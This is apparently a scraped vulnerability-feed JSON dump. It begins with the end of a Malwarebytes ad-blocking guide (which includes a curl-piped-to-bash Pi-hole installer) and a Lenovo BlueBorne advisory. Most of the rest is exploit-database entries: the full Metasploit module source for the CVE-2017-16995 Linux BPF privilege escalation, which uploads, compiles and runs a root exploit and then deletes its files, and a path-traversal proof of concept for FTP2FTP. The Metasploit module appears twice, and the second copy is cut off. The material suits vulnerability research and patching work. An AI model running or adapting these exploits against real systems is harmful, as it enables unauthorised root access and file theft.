terrible, it\u2019s easy to configure NoScript to your personal browsing needs.\n\n\n\nThe simple NoScript interface makes it easy to create exclusions and allow blocked content on either a temporary or permanent basis. Instead of settings and filter lists, NoScript simply uses a series of easy-to-understand buttons to control the content.\n\nAfter NoScript has blocked content on a page, a numbered indicator will be shown on the NoScript icon. Click the icon to view the blocked domains.\n\n\n\nThis image shows elements being blocked on two domains. One of those would be a desired website; the other would be an ad network. Clicking the **Trusted** icon next to the desired website will allow scripts to run ONLY from that domain. Click the green refresh circle at the top to reload the page.\n\n\n\nAfter allowing the root domain the privilege of running scripts, the website functionality may still be lacking. Additional domains may be shown after allowing the root domain, and some may need to be allowed before the content appears.\n\nNoScript allows for temporarily allowing script execution from unknown domains. Simply click the **Temp Trusted** icon to allow code execution until the current session expires. Unfortunately, it may be a bit of trial-and-error to find the domain to allow before seeing the desired content.\n\n\n\nThough not designated as an ad blocker, NoScript will block advertisements injected via third-party scripts. NoScript won\u2019t remove the empty elements from the page, so a tool like uBlock Origin will still be required to de-clutter the page landscape.\n\n\n\nNoScript comes with a list of already assigned permissions, but the list is not extensive. Users will need to configure the program for the websites they most frequent. If the desired website makes heavy use of third-party scripts and content, it will be necessary to individually allow all content-providing domains for the website to function as intended. Some websites make extensive use of outside content, so users may spend considerable time configuring permissions before streamlining the experience.\n\n\n\nNoScript is a valuable tool in any security toolkit. Blocking scripts is an effective way to block malicious activity and unwanted content. Users may have to overcome the steep configuration curve before recognizing the benefit of the tool, but those who do will be rewarded with a faster browsing experience and fewer online trackers compromising their online privacy.\n\n### A note about browsers\n\nBrowsers are the key to a successful ad blocking experience. Some browsers support the use of ad blocking extensions whereas others do not. This post has focused on ad blocking using the Mozilla Firefox browser. Though subjective, Firefox provides a better all-around ad blocking experience across platforms. By using the same browser and plugins across machines, configurations and personal filter lists can be shared across devices. This reduces the configuration time on a per-machine basis and produces a similar web experience\u2014regardless of device.\n\nThough Google Chrome is an [extremely popular](<https://netmarketshare.com/browser-market-share.aspx?options=%7B%22filter%22%3A%7B%22%24and%22%3A%5B%7B%22deviceType%22%3A%7B%22%24in%22%3A%5B%22Desktop%2Flaptop%22%5D%7D%7D%5D%7D%2C%22dateLabel%22%3A%22Custom%22%2C%22attributes%22%3A%22share%22%2C%22group%22%3A%22browser%22%2C%22sort%22%3A%7B%22share%22%3A-1%7D%2C%22id%22%3A%22browsersDesktop%22%2C%22dateInterval%22%3A%22Monthly%22%2C%22dateStart%22%3A%222018-01%22%2C%22dateEnd%22%3A%222018-06%22%2C%22segments%22%3A%22-1000%22%7D>) browser, keep in mind that it is distributed freely by a company that makes a substantial portion of its annual revenue from advertising.\n\nAccording to Statista, Google netted [$95.38 billion dollars](<https://www.statista.com/statistics/266249/advertising-revenue-of-google/>), or roughly 87 percent of [its total revenue](<https://www.statista.com/statistics/266206/googles-annual-global-revenue/>), through advertising. Not only is the company selling ad space on the network, but they also collect information about your browsing activity in order to give \"contextually relevant suggestions\" (a fancy way to say ads).\n\nThe [Google Chrome Privacy Whitepaper](<https://www.google.com/chrome/privacy/whitepaper.html>) and [Chrome Privacy Policy](<https://policies.google.com/privacy>) provide plenty of information on Chrome's collection capabilities, and is an eye-opening read for those concerned about data mining. Some concerning items are shown below with highlighting added for better clarity.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/A-note-about-browsers2.3.wm_.png> \"\" )\n\nThe United States Congress has also become interested in Internet tracking and has recently [requested responses from both Google and Apple](<https://gizmodo.com/apple-and-google-questioned-by-members-of-congress-over-1827461238>) on user tracking practices.\n\nYes, [other browsers will track your behavior](<https://www.mozilla.org/en-US/privacy/firefox/>), but the extent will be reduced when using an open-source browser without an advertising agenda. Those who may be interested in using an open-source browser, but are preferential towards the look and feel of Google Chrome, may be interested to experiment with the [Chromium browser](<https://chromium.woolyss.com/>). Chromium is the open-source project behind Chrome and Opera, and functions [almost identical](<http://www.linuxandubuntu.com/home/google-chrome-vs-chromium>) to both\u2014save for all the Google modifications.\n\n### Block ads on Android\n\nAfter having used an ad blocked browser on mobile, returning to an ad-laced mobile Internet is more than just a diminishment of the user experience\u2014rather, it\u2019s a downright dreadful experience.\n\nThe mobile landscape is already limited in size by its design, yet publishers and website owners feel it necessary to inundate the screen with irrelevant content and banner ads. This renders the content from the main site barely viewable and forces many users to fumble through troublesome mechanisms simply to read an article.\n\n\n\nSome may contend that it\u2019s [best to not click on the ads](<https://www.fastcompany.com/40516897/a-new-wave-of-bad-ads-is-hijacking-even-top-tier-websites>), but a better approach may simply be to get rid of the ads altogether. This will not only declutter the screen and remove the undesirable content, but also improve page response times and lessen the attack surface against devices.\n\nAs we\u2019ve seen throughout this write-up, browser extensions have been key to a successful ad blocking experience\u2014and mobile is no different.\n\nAll of the tools covered in this post are available on mobile devices. But due to restrictions in Google Chrome on Android, users of that browser will be unable to set up the necessary configurations.\n\n\n\nThus, users who wish to block ads on their Android device will be forced to look to other browsers to accomplish the goal.\n\nOne simple solution that even dear old Mom will be able to use is the [Adblock Plus browser](<https://play.google.com/store/apps/details?id=org.adblockplus.browser&hl=en_US>). This Firefox-based browser is built by the same team that produces the Adblock Plus extension and incorporates all of the blocking capabilities in a pre-packaged browser that is configured for a modest ad blocking experience.\n\nUsers wanting more control over the various elements and frames may wish to consider the [jump over to Mozilla](<https://play.google.com/store/apps/details?id=org.mozilla.firefox&hl=en_US>) where all of the plugins and configurations that were discussed in this write-up can be used to block the ads and declutter the screen. Those who opt for the change will see that dreadful mobile experience replaced with an ad-free view of how the page was originally intended to appear.\n\n\n\nMobile browser plugins perform exactly like their desktop counterparts, and will sufficiently block advertisements, trackers, and scripts from your mobile devices. Blocking the content not only improves the mobile web experience, but also helps to conserve battery life, decreases data-usage and the response times of websites, and reduces the attack surface for online threats.\n\nBut with the abundance of mobile devices, setting up policies on individual devices may not be the most efficient way to block advertisements. If there are a number of devices under your control, what would be the most efficient manner to block ads across them? For this, the final tool on our list will fill the void.\n\n### Pi-hole\n\nAdministrators of small businesses or moderate home networks who wish to engage in ad blocking practices without the concern of operating systems, browsers, and plugins may wish to implement a free and (moderately) simple network-based solution. For that need, we have Pi-hole.\n\n[Pi-hole](<https://pi-hole.net/>) is a Linux based, network-level advertising and tracker blocker that acts as a DNS sinkhole for blacklisted domains. This means that advertisements and trackers are blocked before making it into the network. This allows Pi-hole to block ads on not just computers and cell phones, but also smart TVs, third-party apps, and even [streaming video services](<https://github.com/pi-hole/pi-hole/tree/master/block%20hulu%20ads>).\n\n\n\nLike the other tools we've covered, Pi-hole uses filter lists to block undesirable content. The Pi-hole filter list is compiled from various third-party sources into a single list. As such, there will be overlap between the lists used between Pi-hole and other ad blockers like uBlock Origin and Adblock Plus.\n\nPi-hole has been designed to work seamlessly on single board computers, such as [Raspberry Pi](<https://www.amazon.com/Raspberry-Pi-RASPBERRYPI3-MODB-1GB-Model-Motherboard/dp/B01CD5VC92>), but can just as easily function on other Linux machines or cloud-based implementations.\n\n\n\nAlthough not all Pi-hole installations can be as pretty as the [above setup](<https://pi-hole.net/pihole-chrono/>), having a dedicated Linux machine to act as the DNS server will be a necessary requirement.\n\n#### Set up\n\nAfter having a device to configure Pi-hole, setup is [easy and straightforward](<https://lifehacker.com/create-a-network-wide-ad-blocker-with-a-raspberry-pi-1727295925>). The command to install Pi-hole is as simple as:\n\n**curl -sSL https://install.pi-hole.net | bash**\n\n\n\nPrivacy-conscious users may wish to consider using the [Cloudflare DNS](<https://blog.cloudflare.com/announcing-1111/>) for the upstream DNS provider. This privacy-focused DNS provider offers a fast and reliable lookup ([except for the time it wasn't](<https://mspoweruser.com/cloudflares-1-1-1-1-privacy-focussed-dns-service-goes-down-hard/>)). The address is: 1.1.1.1\n\n\n\nAfter configuring your router DHCP options to force clients to use Pi-hole as the primary DNS server, setup will be complete.\n\n\n\nThe web-based panel can then be accessed by typing: [http:/pi.hole/admin](<http://pi.hole/admin>) in your browser. The panel will give overall statistics regarding the number of blocked ads, number of DNS queries, and percentages of blocked traffic. Custom whitelists and blacklists can be configured using the tabs on the left.\n\n\n\n#### Test\n\nNow that it\u2019s all set up, we can have a look to see how well Pi-hole blocks the content.\n\n\n\nAs you can see, Pi-hole does a good job of removing the ads from this page. None of the ads remain, and only a few web elements are left behind. Using the Block Element feature in uBlock Origin or AdBlock Plus (not covered) will clear those unnecessary elements from the page.\n\nAnd though Pi-hole works great to block ads at the network level and for all devices, users may still be required to configure a per-device ad blocking policy in order to protect laptops and mobile devices when not under the protection of the Pi-hole DNS sinkhole. Pain though this may be, Pi-hole makes an excellent addition to any ad blocking arsenal. The benefits of blocking ads throughout your environment and across streaming platforms outweigh the duplication efforts involved.\n\n### A final note\n\nIn preparation for this article, I spoke with a number of friends and colleagues regarding their ad blocking preferences. Despite the fact that we are all in security and all read and share the same information, few of us block (or view) online advertisements and trackers the same way.\n\nWhat I\u2019ve come to realize is ad blocking is often reflective of one\u2019s personal experiences and perception of online threats. The level to which a person is willing to go to maintain personal security can depend on the level of tolerance and compromise that person is willing to extend in exchange for the belief that their activities are secure.\n\nCase in point: Some colleagues block advertisements from third-party advertisers due to security concerns, but those same people may allow suggestions from their search provider on the notion that ads from reputable vendors don\u2019t pose the same risk. Others may be adamant about blocking ads on their network as to not compromise proprietary information, but will tolerate ads on their mobile device as to not interfere with mobile browsing functionality.\n\nA few take a hard-line approach and block as much as possible, which can render websites inoperable, while a majority are willing to compromise in exchange for a more user-friendly experience.\n\nThough this article takes the position that all advertisements should be blocked, not everyone will agree. Some see the benefit in online advertising. Others may agree about blocking advertising content, but disagree with the methodology used in this post.\n\nIn a nutshell, there is no right or wrong way to block advertisements and trackers, and there seems to be little consensus regarding the most effective manner in which to do so.\n\nTherefore, those wishing to configure an ad blocking policy within their environment will be encouraged to experiment with various products and methods to find what works best for their needs.\n\n### Block ads like a pro!\n\nYou\u2019ve read this post and are hopefully coming away with the knowledge of why it\u2019s important to block ads and the tools necessary to do so. But how should you set up your own network?\n\nOf course, I can\u2019t tell you that. You'll have to come up with the system that best fits your needs, environment, and patience levels. But what I _can_ tell you is how my personal setup is configured.\n\n**Desktop** | | **Mobile** \n---|---|--- \nDefault Browser: | Mozilla Firefox with ad blocking protections | | Default Browser: | Mozilla Firefox with ad blocking protections \nSecondary Browser(s): | Chromium / Internet Explorer without protections | | Secondary Browser(s): | Opera (currently, but this changes) no protections \n| | | Google Chrome: | Rooted & Removed \nBrowser Extensions | | Browser Extensions \nAdblock Plus: | | | uBlock Origin: | \n| Adblock Warning Removal List | | | uBlock filters \n| Facebook annoyances blocker | | | uBlockfilters - Badware risks \n| NoCoin Filter List | | | uBlock filters - Privacy \nuBlock Origin: | | | | uBlock filters - Resource abuse \n| uBlock filters | | | uBlock filters - Unbreak \n| uBlockfilters - Badware risks | | | Adguard Mobile Filters \n| uBlock filters - Privacy | | | EasyList \n| uBlock filters - Resource abuse | | | EasyPrivacy \n| uBlock filters - Unbreak | | | Fanboy's Enhanced Tracking List \n| EasyList | | | Malware Domain List \n| EasyPrivacy | | | Malware domains \n| Fanboy's Enhanced Tracking List | | | Peter Lowe's Ad and tracking server list \n| Malware Domain List | | NoScript | \n| Malware domains | | [**Decentraleyes**](<https://addons.mozilla.org/en-US/firefox/addon/decentraleyes/>) | (not covered) \n| Fanboy's Annoyance List | | | \n| Fanboy's Anti-Third-party Social | | | \n| Fanboy's Cookiemonster List | | | \n| Fanboy's Social Blocking List | | | \n| Peter Lowe's Ad and tracking server list | | | \nNoScript | | | | \n[**Privacy Badger**](<https://addons.mozilla.org/en-US/firefox/addon/privacy-badger17/>) | (not covered) | | | \n[**Decentraleyes**](<https://addons.mozilla.org/en-US/firefox/addon/decentraleyes/>) | (not covered) | | | \n| | | | \n \n * Though not in my current setup, [Ghostery](<https://addons.mozilla.org/en-US/firefox/addon/ghostery/?src=search>) deserves a shout-out. Users might consider giving it a try also.\n\nThese tools help to maintain a relatively ad-free experience, limit my exposure to privacy-invading trackers and online threats, and along with well-defined personal filter lists, help keep my favorite websites running smoothly and efficiently. Taken together (and considering the nifty calculation provided by uBlock), I\u2019d estimate that anywhere from 18 to 33 percent of total traffic is blocked due to unwanted or unapproved content.\n\n\n\nThis concludes our series, \u201c_[Everybody and their mother is blocking ads, so why aren\u2019t you](<https://blog.malwarebytes.com/security-world/privacy-security-world/2018/07/mother-is-blocking-ads-so-why-arent-you/>)_?\u201d. We hope you are coming away with a better understanding of how online advertisements pose a threat to your online security and how trackers can jeopardize your personal privacy. You should now have the knowledge of why it\u2019s important to block advertisements on your devices, and the know-how to create a robust and successful ad-blocking policy within your network and for your devices. Most importantly, we hope we\u2019ve given you the tools and the empowerment to take back control of your browsing experience and to block ads in your own environment\u2014just like the pros.\n\n**_ This post reflects the opinion of the writer, serving as a review of the tools available to block online advertisements. Malwarebytes has no affiliations with and does not endorse any of the companies or tools listed in this write-up. _**\n\nThe post [How to block ads like a pro](<https://blog.malwarebytes.com/security-world/2018/07/how-to-block-ads-like-a-pro/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "reporter": "Adam McNeil", "published": "2018-07-19T17:24:34", "type": "malwarebytes", "title": "How to block ads like a pro", "enchantments": {"score": {"modified": "2018-07-19T20:45:35", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-07-19T17:24:34", "id": "MALWAREBYTES:BCB000163BC271CD56158AF7FE103737", "href": "https://blog.malwarebytes.com/security-world/2018/07/how-to-block-ads-like-a-pro/", "cvss": {"score": 0.0, "vector": "NONE"}}], "lenovo": [{"lastseen": "2018-07-19T17:41:20", "references": [], "description": "**Lenovo Security Advisory**: LEN-17125\n\n**Potential Impact**: Remote code execution\n\n**Severity**: High\n\n**Scope of Impact**: Industry wide\n\n**CVE Identifier**: CVE-2017-0781, CVE-2017-0782, CVE-2017-0783, CVE-2017-0785, CVE-2017-8628, CVE-2017-14315, CVE-2017-1000250, CVE-2017-1000251\n\n**Summary Description**:\n\nA collection of Bluetooth implementation vulnerabilities known as \"BlueBorne\" have been identified that affect Windows, iOS, and Linux-kernel-based operating systems. In worst case scenarios, these vulnerabilities allow an unauthenticated attacker to perform commands on affected devices.\n\n**Mitigation Strategy for Consumers (what you should do to protect yourself):**\n\nPatches are available in the latest patch releases from Windows (see [Microsoft bulletin](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)), iOS, Linux providers, and Android (see [September 2017 security bulletin](<https://source.android.com/security/bulletin/2017-09-01>)).\n\nU.S.-based phone and other mobile device users running Android are advised to regularly check this advisory page. Due to the complexity of the U.S. mobile ecosystem, which typically requires manufacturer and carrier support to push updates, updates are in progress. Users are encouraged to accept updates to their Android device upon receiving notifications to update their operating system.\n\n \nIf an update is not available, affected users should consider disabling Bluetooth on affected devices if Bluetooth is unused or unnecessary.\n\n**Product Impact**:\n", "edition": 7, "reporter": "Lenovo", "published": "2018-07-19T12:31:00", "title": "Bluetooth \u201cBlueBorne\u201d Vulnerabilities - us", "type": "lenovo", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2017-1000250", "CVE-2017-0781", "CVE-2017-0785", "CVE-2017-1000251", "CVE-2017-8628", "CVE-2017-0783", "CVE-2017-14315", "CVE-2017-0782"], "modified": "2018-07-19T12:31:00", "id": "LENOVO:PS500141-NOSID", "href": "https://support.lenovo.com/us/en/product_security/len-17125", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-07-19T10:11:10", "references": [], "description": "Linux kernel versions prior to 4.14.8 utilize the Berkeley Packet Filter (BPF) which contains a vulnerability where it may improperly perform signing for an extension. This can be utilized to escalate privileges. The target system must be compiled with BPF support and must not have kernel.unprivileged_bpf_disabled set to 1. This Metasploit module has been tested successfully on many different kernels.", "edition": 1, "reporter": "metasploit", "published": "2018-07-19T00:00:00", "title": "Linux Kernel < 4.14.8 Sign Extension Local Privilege Escalation Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-07-19T10:11:10", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16995"], "modified": "2018-07-19T00:00:00", "id": "1337DAY-ID-30750", "href": "https://0day.today/exploit/description/30750", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Post::Linux::Kernel\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linux BPF Sign Extension Local Privilege Escalation',\r\n 'Description' => %q{\r\n Linux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF)\r\n which contains a vulnerability where it may improperly perform sign\r\n extension. This can be utilized to escalate privileges.\r\n\r\n The target system must be compiled with BPF support and must not have\r\n kernel.unprivileged_bpf_disabled set to 1.\r\n\r\n This module has been tested successfully on:\r\n\r\n Debian 9.0 kernel 4.9.0-3-amd64;\r\n Deepin 15.5 kernel 4.9.0-deepin13-amd64;\r\n ElementaryOS 0.4.1 kernel 4.8.0-52-generic;\r\n Fedora 25 kernel 4.8.6-300.fc25.x86_64;\r\n Fedora 26 kernel 4.11.8-300.fc26.x86_64;\r\n Fedora 27 kernel 4.13.9-300.fc27.x86_64;\r\n Gentoo 2.2 kernel 4.5.2-aufs-r;\r\n Linux Mint 17.3 kernel 4.4.0-89-generic;\r\n Linux Mint 18.0 kernel 4.8.0-58-generic;\r\n Linux Mint 18.3 kernel 4.13.0-16-generic;\r\n Mageia 6 kernel 4.9.35-desktop-1.mga6;\r\n Manjero 16.10 kernel 4.4.28-2-MANJARO;\r\n Solus 3 kernel 4.12.7-11.current;\r\n Ubuntu 14.04.1 kernel 4.4.0-89-generic;\r\n Ubuntu 16.04.2 kernel 4.8.0-45-generic;\r\n Ubuntu 16.04.3 kernel 4.10.0-28-generic;\r\n Ubuntu 17.04 kernel 4.10.0-19-generic;\r\n ZorinOS 12.1 kernel 4.8.0-39-generic.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Jann Horn', # Discovery\r\n 'bleidl', # Discovery and get-rekt-linux-hardened.c exploit\r\n 'vnik', # upstream44.c exploit\r\n 'rlarabee', # cve-2017-16995.c exploit\r\n 'h00die', # Metasploit\r\n 'bcoles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Nov 12 2017',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n [ 'AKA', 'get-rekt-linux-hardened.c' ],\r\n [ 'AKA', 'upstream44.c' ],\r\n [ 'BID', '102288' ],\r\n [ 'CVE', '2017-16995' ],\r\n [ 'EDB', '44298' ],\r\n [ 'EDB', '45010' ],\r\n [ 'URL', 'https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c' ],\r\n [ 'URL', 'https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c' ],\r\n [ 'URL', 'http://cyseclabs.com/pub/upstream44.c' ],\r\n [ 'URL', 'https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor' ],\r\n [ 'URL', 'https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html' ],\r\n [ 'URL', 'https://www.debian.org/security/2017/dsa-4073' ],\r\n [ 'URL', 'https://usn.ubuntu.com/3523-2/' ],\r\n [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-16995.html' ],\r\n [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1454' ],\r\n [ 'URL', 'http://openwall.com/lists/oss-security/2017/12/21/2'],\r\n [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6f' ]\r\n ],\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n\r\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n rm_f \"#{path}.c\"\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable.\"\r\n end\r\n\r\n cmd_exec \"chmod +x #{path}\"\r\n end\r\n\r\n def exploit_data(file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-16995', file\r\n fd = ::File.open path, 'rb'\r\n data = fd.read fd.stat.size\r\n fd.close\r\n data\r\n end\r\n\r\n def live_compile?\r\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n\r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n return true\r\n end\r\n\r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\r\n end\r\n end\r\n\r\n def check\r\n arch = kernel_hardware\r\n unless arch.include? 'x86_64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n\r\n if unprivileged_bpf_disabled?\r\n vprint_error 'Unprivileged BPF loading is not permitted'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'Unprivileged BPF loading is permitted'\r\n\r\n release = kernel_release\r\n if Gem::Version.new(release.split('-').first) > Gem::Version.new('4.14.11') ||\r\n Gem::Version.new(release.split('-').first) < Gem::Version.new('4.0')\r\n vprint_error \"Kernel version #{release} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Kernel version #{release} appears to be vulnerable\"\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Appears\r\n fail_with Failure::NotVulnerable, 'Target not vulnerable! punt!'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n\r\n unless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true'\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload exploit executable\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n upload_and_compile executable_path, exploit_data('exploit.c')\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n upload_and_chmodx executable_path, exploit_data('exploit.out')\r\n end\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status 'Launching exploit ...'\r\n output = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path} \"\r\n output.each_line { |line| vprint_status line.chomp }\r\n print_status \"Cleaning up #{payload_path} and #{executable_path} ...\"\r\n rm_f executable_path\r\n rm_f payload_path\r\n end\r\nend\n\n# 0day.today [2018-07-19] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30750"}, {"lastseen": "2018-07-19T12:03:21", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "AkkuS", "published": "2018-07-19T00:00:00", "title": "FTP2FTP 1.0 - Arbitrary File Download Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-07-19T12:03:21", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-07-19T00:00:00", "id": "1337DAY-ID-30749", "href": "https://0day.today/exploit/description/30749", "sourceData": "# Exploit Title: FTP2FTP 1.0 - Arbitrary File Download\r\n# Dork: N/A\r\n# Date: 18.07.2018\r\n# Exploit Author: \u00d6zkan Mustafa Akku\u015f (AkkuS)\r\n# Vendor Homepage: https://codecanyon.net/item/ftp2ftp-server-to-server-file-transfer-php-script/21972395\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: Kali linux\r\n# Description : The \"download2.php\" is vulnerable in the admin panel.\r\nThe attacker can download and read all files known by the name via 'id' parameter.\r\n \r\n====================================================\r\n \r\n \r\n# Vuln file : /FTP2FTP/download2.php\r\n \r\n1. <?php\r\n2. $file = \"tempFiles2/\".$_GET['id'];\r\n3.\r\n4.\r\n5. if (file_exists($file)) {\r\n6. header('Content-Description: File Transfer');\r\n7. header('Content-Type: application/octet-stream');\r\n8. header('Content-Disposition: attachment; filename=\"'.basename($file).'\"');\r\n9. header('Expires: 0');\r\n10. header('Cache-Control: must-revalidate');\r\n11. header('Pragma: public');\r\n12. header('Content-Length: ' . filesize($file));\r\n13. readfile($file);\r\n14. exit;\r\n15. }\r\n16. ?>\r\n \r\n# PoC : http://sitenet/FTP2FTP/download2.php?id=../index.php\n\n# 0day.today [2018-07-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30749"}], "exploitdb": [{"lastseen": "2018-07-19T21:14:45", "osvdbidlist": [], "references": [], "description": "Linux - BPF Sign Extension Local Privilege Escalation (Metasploit). CVE-2017-16995. Local exploit for Linux platform. Tags: Metasploit Framework (MSF), Local", "edition": 1, "reporter": "Exploit-DB", "published": "2018-07-19T00:00:00", "title": "Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)", "type": "exploitdb", "enchantments": {"score": {"modified": "2018-07-19T21:14:45", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16995"], "modified": "2018-07-19T00:00:00", "id": "EDB-ID:45058", "href": "https://www.exploit-db.com/exploits/45058/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Post::Linux::Kernel\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linux BPF Sign Extension Local Privilege Escalation',\r\n 'Description' => %q{\r\n Linux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF)\r\n which contains a vulnerability where it may improperly perform sign\r\n extension. This can be utilized to escalate privileges.\r\n\r\n The target system must be compiled with BPF support and must not have\r\n kernel.unprivileged_bpf_disabled set to 1.\r\n\r\n This module has been tested successfully on:\r\n\r\n Debian 9.0 kernel 4.9.0-3-amd64;\r\n Deepin 15.5 kernel 4.9.0-deepin13-amd64;\r\n ElementaryOS 0.4.1 kernel 4.8.0-52-generic;\r\n Fedora 25 kernel 4.8.6-300.fc25.x86_64;\r\n Fedora 26 kernel 4.11.8-300.fc26.x86_64;\r\n Fedora 27 kernel 4.13.9-300.fc27.x86_64;\r\n Gentoo 2.2 kernel 4.5.2-aufs-r;\r\n Linux Mint 17.3 kernel 4.4.0-89-generic;\r\n Linux Mint 18.0 kernel 4.8.0-58-generic;\r\n Linux Mint 18.3 kernel 4.13.0-16-generic;\r\n Mageia 6 kernel 4.9.35-desktop-1.mga6;\r\n Manjero 16.10 kernel 4.4.28-2-MANJARO;\r\n Solus 3 kernel 4.12.7-11.current;\r\n Ubuntu 14.04.1 kernel 4.4.0-89-generic;\r\n Ubuntu 16.04.2 kernel 4.8.0-45-generic;\r\n Ubuntu 16.04.3 kernel 4.10.0-28-generic;\r\n Ubuntu 17.04 kernel 4.10.0-19-generic;\r\n ZorinOS 12.1 kernel 4.8.0-39-generic.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Jann Horn', # Discovery\r\n 'bleidl', # Discovery and get-rekt-linux-hardened.c exploit\r\n 'vnik', # upstream44.c exploit\r\n 'rlarabee', # cve-2017-16995.c exploit\r\n 'h00die', # Metasploit\r\n 'bcoles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Nov 12 2017',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n [ 'AKA', 'get-rekt-linux-hardened.c' ],\r\n [ 'AKA', 'upstream44.c' ],\r\n 